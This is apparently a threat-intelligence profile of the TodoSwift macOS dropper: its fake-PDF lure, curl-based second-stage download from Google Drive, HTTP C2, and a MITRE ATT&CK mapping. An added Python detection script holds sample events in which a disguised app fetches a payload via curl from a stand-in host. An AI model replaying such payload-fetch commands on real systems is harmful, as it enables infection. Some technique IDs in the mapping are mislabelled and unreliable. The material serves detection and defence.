| TodoSwift | |
| --- | --- |
| Type of Malware | Dropper |
| Country of Origin | North Korea |
| Date of Initial Activity | 2024 |
| Associated Groups | BlueNoroff |
| Motivation | Financial Gain |
| Attack Vectors | Phishing |
| Targeted Systems | macOS |
Overview
A new and sophisticated macOS malware named TodoSwift has emerged, capturing the attention of the cybersecurity community due to its deceptive techniques and the threat it poses to macOS users. Identified on August 21, 2024, TodoSwift is a dropper application that masquerades as a seemingly innocent PDF related to Bitcoin pricing. This social engineering tactic lures unsuspecting victims into executing the malware, unaware of the hidden danger it carries. While appearing harmless, TodoSwift is a carefully crafted malware developed with Swift and SwiftUI, Apple's programming language and UI framework for macOS, which adds a further layer of complexity to its execution.
Targets
Individuals
How they operate
Upon first contact, TodoSwift employs a social engineering strategy, presenting itself as an innocent PDF related to Bitcoin pricing. The malware is often distributed through phishing emails or malicious websites, where users are tricked into downloading the file. What seems to be a harmless document is, in fact, a dropper—a type of malware designed to initiate the infection process by deploying additional malicious payloads onto the victim’s machine. The attacker behind TodoSwift uses Google Drive URLs to host the malware, leveraging the trust users have in reputable cloud storage services. By using these services, the attacker avoids raising suspicion and makes the malware more difficult to detect.
Once downloaded, TodoSwift operates by executing a dropper application, which has been developed using Swift and SwiftUI, Apple's modern programming language and UI framework for macOS and iOS development. The malware's first action is to use NSTask, an Apple API used to execute external system commands. With NSTask, the malware runs curl commands, a commonly used command-line tool in Unix-based systems. These curl commands retrieve the second-stage payload from remote servers controlled by the attacker. The payload may then be executed on the system, completing the infection cycle and potentially allowing the attacker to take full control of the compromised device.
The malware uses Command and Control (C2) communication to establish a persistent link between the compromised device and the attacker’s servers. TodoSwift’s C2 communication often relies on HTTP protocols to send and receive data, which makes it harder to detect since web traffic is typically seen as benign. In addition, TodoSwift makes use of command-line arguments passed during execution, which include embedded C2 URLs. These URLs point to remote servers, where additional malicious payloads or instructions are hosted. Once connected, the compromised system can download more sophisticated malware, upload sensitive information, or execute further commands, all under the attacker’s control.
TodoSwift’s use of NSTask and curl commands reflects a clear technical design choice to blend in with regular system operations, thus avoiding detection by traditional security mechanisms. The reliance on macOS system APIs and the use of trusted cloud services for the delivery mechanism are key factors in making the malware difficult to spot in its early stages. Additionally, TodoSwift’s ability to interact with remote servers via web protocols further complicates detection efforts by security tools that might not flag routine web traffic as suspicious.
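The behaviour described above (a document-lookalike app bundle that is launched with a URL in its arguments and spawns curl to pull a second stage from a cloud-storage host) can be hunted for in process-execution telemetry. The following is an added example written for this page, not code from the original write-up or from any vendor; the JSON event lines, the `Bitcoin_Price.pdf.app` bundle path, the `example.invalid` host and the Google Drive `id=PLACEHOLDER` value are all constructed for illustration.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample process-execution events (one JSON object per line); not real telemetry.
SAMPLE_EVENTS = """
{"pid":401,"ppid":1,"exe":"/Applications/Preview.app/Contents/MacOS/Preview","args":["Preview","/Users/a/Bitcoin_Report.pdf"]}
{"pid":512,"ppid":1,"exe":"/Users/a/Downloads/Bitcoin_Price.pdf.app/Contents/MacOS/Bitcoin_Price","args":["Bitcoin_Price","http://example.invalid/stage2"]}
{"pid":513,"ppid":512,"exe":"/usr/bin/curl","args":["curl","-s","-o","/tmp/.p","https://drive.google.com/uc?id=PLACEHOLDER"]}
{"pid":600,"ppid":1,"exe":"/bin/bash","args":["bash"]}
{"pid":601,"ppid":600,"exe":"/usr/bin/curl","args":["curl","-fsSL","https://brew.sh/install.sh"]}
"""

# Cloud-storage share hosts that the page notes are abused for payload delivery.
CLOUD_HOSTS = {"drive.google.com", "docs.google.com", "drive.usercontent.google.com"}
# An app bundle whose name carries a document extension (e.g. "Report.pdf.app") is a masquerade signal.
DOC_EXT_IN_BUNDLE = re.compile(r"\.(pdf|docx?|xlsx?)\.app/", re.IGNORECASE)

def parse_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]

def url_args(args):
    return [a for a in args if a.startswith(("http://", "https://"))]

def analyze(events):
    """Return alerts for curl processes spawned by a document-lookalike parent."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if not e["exe"].endswith("/curl"):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        reasons = []
        if DOC_EXT_IN_BUNDLE.search(parent["exe"]):
            reasons.append("parent bundle name carries a document extension")
        if url_args(parent["args"]):
            reasons.append("parent was launched with a URL in its arguments")
        if not reasons:  # a plain curl from a shell or installer is not interesting here
            continue
        for u in url_args(e["args"]):  # supporting evidence only, never sufficient on its own
            host = urlparse(u).hostname
            if host in CLOUD_HOSTS:
                reasons.append(f"download from cloud-storage host {host}")
        if "-o" in e["args"] or "-O" in e["args"]:
            reasons.append("curl writes the download to disk")
        alerts.append({"pid": e["pid"], "parent": parent["exe"], "reasons": reasons})
    return alerts

if __name__ == "__main__":
    print(json.dumps(analyze(parse_events(SAMPLE_EVENTS)), indent=2))
```

The legitimate Preview and Homebrew-style curl invocations in the sample are left alone; only the curl child of the `.pdf.app` bundle is reported, with four supporting reasons.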
In summary, TodoSwift is a well-crafted malware that capitalizes on user trust, macOS system capabilities, and modern web protocols to carry out its attack. By masquerading as a legitimate PDF, using cloud storage services for delivery, and executing commands via system APIs, it presents a significant threat to macOS users. The malware’s success hinges on its ability to remain stealthy during the initial infection phase, ultimately enabling attackers to steal data or deploy additional malicious software without detection. The increasing sophistication of such threats underscores the need for enhanced security practices, including awareness of social engineering tactics and the use of robust endpoint protection systems.
MITRE Tactics and Techniques
1. Initial Access
Phishing (T1566): TodoSwift masquerades as a legitimate PDF file, a social engineering tactic that deceives the user into downloading and executing the malware. The fake PDF is likely distributed via email or other deceptive methods, which is common in phishing attacks.
Drive-by Compromise (T1189): The malware is hosted on Google Drive, which is a trusted cloud storage service. Attackers often use reputable services to disguise the origin of the malicious content and trick users into downloading it.
2. Execution
User Execution (T1203): Once the user opens the disguised PDF, the malware is executed. This is a key step where the user unknowingly runs the dropper, starting the attack sequence.
Command and Scripting Interpreter (T1059): TodoSwift uses NSTask to execute system commands via the curl command-line tool. This technique is often used to download or retrieve malicious payloads from a remote server.
3. Persistence
Masquerading (T1036): TodoSwift masquerades as a legitimate PDF document to evade detection. By using a trusted file type and naming conventions that appear to be innocuous, it maintains persistence on the system by remaining undetected for as long as possible.
4. Command and Control
Application Layer Protocol (T1071): TodoSwift communicates with a command-and-control (C2) server using web protocols like HTTP. It uses cloud-based storage URLs (such as Google Drive) and embedded C2 URLs in the launch arguments to exfiltrate data or receive further instructions from the attacker.
5. Exfiltration
Exfiltration Over Command and Control Channel (T1041): After retrieving the second-stage payload, the malware is capable of communicating with remote servers over the C2 channel. This can include sending data from the compromised system to the attackers.
6. Impact
Data Manipulation (T1565): If the second-stage payload allows the attackers to modify, steal, or manipulate system data (including files, credentials, or system settings), this could fall under the impact category.